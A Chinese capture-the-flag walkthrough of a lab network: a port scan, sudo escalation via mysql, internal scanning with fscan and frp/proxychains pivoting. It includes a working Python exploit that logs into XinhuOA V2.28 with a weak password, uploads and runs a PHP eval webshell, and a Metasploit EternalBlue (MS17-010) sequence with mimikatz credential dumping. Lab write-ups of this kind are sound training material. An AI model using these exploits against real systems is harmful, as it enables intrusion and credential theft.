春秋云镜-Initial

信息搜集

先扫描

22和80

渗透利用

连蚁剑，

sudo -l

发现mysql具有root权限

flag01

拿到flag1

查看内网ip

上fscan开扫

开的够多的

172.22.1.2   DC 
172.22.1.21  MS17-010 
172.22.1.18  信呼OA

flag02

接下来先打信呼OA，我们接下来上传frp到主机上，让内网的流量转发出来。

先打信乎OA

弱口令可以爆破，但是环境容易爆，谨慎

admin/admin123

进后台发现版本是V2.28

当前目录建一个1.php

<?php eval($_POST["1"]);?>

exp

import requests

session = requests.session()

url_pre = 'http://172.22.1.18/'
url1 = url_pre + '?a=check&m=login&d=&ajaxbool=true&rnd=533953'
url2 = url_pre + '/index.php?a=upfile&m=upload&d=public&maxsize=100&ajaxbool=true&rnd=798913'
url3 = url_pre + '/task.php?m=qcloudCos|runt&a=run&fileid=11'

data1 = {
    'rempass': '0',
    'jmpass': 'false',
    'device': '1625884034525',
    'ltype': '0',
    'adminuser': 'YWRtaW4=',
    'adminpass': 'YWRtaW4xMjM=',
    'yanzm': ''
}

r = session.post(url1, data=data1)
r = session.post(url2, files={'file': open('1.php', 'r+')})

filepath = str(r.json()['filepath'])
filepath = "/" + filepath.split('.uptemp')[0] + '.php'
id = r.json()['id']

url3 = url_pre + f'/task.php?m=qcloudCos|runt&a=run&fileid={id}'

r = session.get(url3)
r = session.get(url_pre + filepath + "?1=system('dir');")
print(r.text)

C:/Users/Administrator/flag/flag02.txt

flag02: 2ce3-4813-87d4-

flag03

最后打MS17-010，需要利用proxifier+msf攻击

首先配置一下proxychains（把公网服务器作为代理来进入内网）

vim /etc/proxychains.conf

msfconsole攻击

proxychains msfconsole
use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/bind_tcp_uuid
set RHOSTS 172.22.1.21
exploit

攻击成功后我们会得到一个正向连接的shell（meterpreter）

load kiwi调用mimikatz模块

e8f88d0d43d6}

flag{60b53231-2ce3-4813-87d4-e8f88d0d43d6}

总结

第一次打春秋云镜的靶场。做的最简单的一个，难度不打，其中最大的难题就是代理问题，分两次打的，第一次搭的时候卡了半天，不知道是不是手机的原因，能连接上，但是本地访问内网就是行不通。

后面可以了，接触到了linux下代理和windows搭建代理，frp配合proxifier的使用，linux代理下执行命令需要在命令前加入proxychains即可，windows搭建的全局代理只需设定相应的ip段，不影响电脑上其他应用的使用

过程有些粗糙，好歹流程也是了解了，嘻嘻